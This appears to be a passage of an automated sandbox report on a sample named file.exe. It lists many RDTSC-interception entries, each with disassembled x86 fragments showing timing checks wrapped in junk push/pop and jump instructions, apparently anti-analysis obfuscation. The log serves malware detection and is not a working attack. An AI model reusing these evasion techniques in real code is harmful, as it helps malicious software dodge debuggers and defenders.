Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D176A2 second address: D176C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF0BC8515E3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D179B6 second address: D179FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c add dword ptr [ebp+122D1D3Ch], eax 0x00000012 mov edi, dword ptr [ebp+122D2906h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jmp 00007FF0BCB462C7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D179FD second address: D17A07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AD2 second address: D17AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FF0BCB462C0h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AEE second address: D17AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AF2 second address: D17B28 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF0BCB462BCh 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FF0BCB462C0h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17D35 second address: D17D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF0BC8515E9h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17D5F second address: D17DC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0BCB462BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jl 00007FF0BCB462BCh 0x00000011 sub edi, dword ptr [ebp+122D2BF2h] 0x00000017 mov dx, bx 0x0000001a push 00000004h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007FF0BCB462B8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 mov dword ptr [ebp+12471713h], ecx 0x0000003c nop 0x0000003d jmp 00007FF0BCB462C7h 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jbe 00007FF0BCB462B6h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17DC6 second address: D17DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5082C second address: D5084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FF0BCB462F5h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FF0BCB462B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B0C second address: D50B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B10 second address: D50B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007FF0BCB462B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B21 second address: D50B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push ebx 0x00000007 jnp 00007FF0BC8515D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FF0BC8515D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B38 second address: D50B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50DE7 second address: D50DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50DED second address: D50E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50E0E second address: D50E29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50E29 second address: D50E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55883 second address: D55889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5A3B1 second address: D5A3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60521 second address: D60525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60525 second address: D6053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6053A second address: D6053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6080D second address: D60813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60A94 second address: D60A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60A9A second address: D60AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6272F second address: D62737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D654D9 second address: D654DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D654DD second address: D654E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D654E3 second address: D65504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jno 00007FF0BCB462C5h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA3F second address: D6AA45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA45 second address: D6AA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BCB462C5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA60 second address: D6AA65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA65 second address: D6AA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA74 second address: D6AA88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FF0BC8515D8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA88 second address: D6AA94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FF0BCB462B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA94 second address: D6AA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA98 second address: D6AAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF0BCB462BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6932F second address: D69335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6976B second address: D6976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6976F second address: D69773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69773 second address: D69779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69779 second address: D69794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BC8515DFh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A783 second address: D6A7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71722 second address: D71726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71726 second address: D7172C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70628 second address: D7062E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D708EB second address: D708F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70BDB second address: D70BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70E3F second address: D70E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70E4F second address: D70E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FF0BC8515D6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0BC8515E3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70E71 second address: D70E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71153 second address: D71157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71157 second address: D7115B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7115B second address: D71175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BC8515DCh 0x0000000b jo 00007FF0BC8515DEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71465 second address: D7146B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7146B second address: D7147B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF0BC8515D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7147B second address: D7147F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7147F second address: D71492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jne 00007FF0BC8515DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7399A second address: D739B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D74FB5 second address: D74FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D74FB9 second address: D74FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78B6B second address: D78B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78B71 second address: D78B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77D11 second address: D77D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77D15 second address: D77D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BCB462C7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EA1 second address: D77EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EA5 second address: D77EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EA9 second address: D77EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF0BC8515DAh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D782AE second address: D782C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7844E second address: D78465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FF0BC8515DBh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78898 second address: D7889C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7889C second address: D788A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86560 second address: D86566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D84D76 second address: D84D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85023 second address: D85029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85029 second address: D85030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D855A2 second address: D855BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF0BCB462C3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D855BD second address: D855DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D855DA second address: D855E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863C1 second address: D863C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863C5 second address: D863CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863CE second address: D863E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863E6 second address: D8640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FF0BCB462C7h 0x0000000c jg 00007FF0BCB462BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DE71 second address: D8DE7B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0BC8515D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DE7B second address: D8DE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BCB462C6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A674 second address: D9A67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A289 second address: D9A2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FF0BCB462C0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9A2A2 second address: D9A2A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C6D4 second address: D9C6EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0BCB462C3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C6EE second address: D9C6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C2BB second address: D9C2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C2C1 second address: D9C2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C426 second address: D9C43F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C43F second address: D9C44D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515DAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9FFEA second address: DA0009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF0BCB462BCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAED88 second address: DAEDAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF0BC8515E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDAF second address: DAEDC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BCB462C3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDC8 second address: DAEDED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FF0BC8515D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDED second address: DAEDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAEDF1 second address: DAEDF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD8F5E second address: CD8F63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DB55D1 second address: DB55D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
